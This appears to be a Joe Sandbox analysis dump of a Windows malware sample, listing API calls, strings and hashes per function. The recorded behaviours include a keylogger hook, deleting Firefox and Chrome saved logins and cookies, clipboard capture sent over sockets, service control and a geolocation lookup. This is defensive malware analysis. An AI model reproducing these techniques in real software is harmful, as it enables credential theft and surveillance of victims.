                                • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                                • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                • FindClose.KERNEL32(00000000), ref: 0040AC53
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                                • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                • FindClose.KERNEL32(00000000), ref: 0040AE11
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                                • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                APIs
                                • OpenClipboard.USER32 ref: 00414EC2
                                • EmptyClipboard.USER32 ref: 00414ED0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                • CloseClipboard.USER32 ref: 00414F55
                                • OpenClipboard.USER32 ref: 00414F5C
                                • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                • CloseClipboard.USER32 ref: 00414F84
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID:
                                • API String ID: 3520204547-0
                                • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                                • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID: 05Mw`Mw
                                • API String ID: 2341273852-1602716814
                                • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                                • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7
                                • API String ID: 0-3177665633
                                • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                                • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                • GetLastError.KERNEL32 ref: 00418771
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                                • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                                • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                • GetLastError.KERNEL32 ref: 00409375
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                • TranslateMessage.USER32(?), ref: 004093D2
                                • DispatchMessageA.USER32(?), ref: 004093DD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error $`Mw
                                • API String ID: 3219506041-1277971878
                                • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                                • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                APIs
                                  • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                • SetLastError.KERNEL32(0000000E), ref: 0041082E
                                  • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                                • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                                • SetLastError.KERNEL32(0000045A), ref: 0041098F
                                  • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                                  • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID: $.F
                                • API String ID: 3950776272-1421728423
                                • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                                • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                • Opcode Fuzzy Hash: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
                                • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                APIs
                                • _free.LIBCMT ref: 00446741
                                • _free.LIBCMT ref: 00446765
                                • _free.LIBCMT ref: 004468EC
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                • _free.LIBCMT ref: 00446AB8
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                APIs
                                  • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                  • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                  • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                • Sleep.KERNEL32(00000BB8), ref: 0040E243
                                • ExitProcess.KERNEL32 ref: 0040E2B4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                • API String ID: 2281282204-1386060931
                                • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                                • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                • InternetCloseHandle.WININET(00000000), ref: 00419407
                                • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 004193A2
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                • GetLastError.KERNEL32 ref: 0040A999
                                Strings
                                • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                • UserProfile, xrefs: 0040A95F
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                                • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                • GetLastError.KERNEL32 ref: 00415CDB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408393
                                  • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                  • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                  • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                  • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                • FindClose.KERNEL32(00000000), ref: 004086F4
                                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                APIs
                                • GetForegroundWindow.USER32 ref: 0040949C
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                • GetKeyState.USER32(00000010), ref: 004094B8
                                • GetKeyboardState.USER32(?), ref: 004094C5
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                • String ID:
                                • API String ID: 3566172867-0
                                • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: H"G$`'G$`'G
                                • API String ID: 341183262-2774397156
                                • Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                • Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
                                • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                APIs
                                  • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                  • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                  • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                  • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                  • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-1420736420
                                • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                                • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
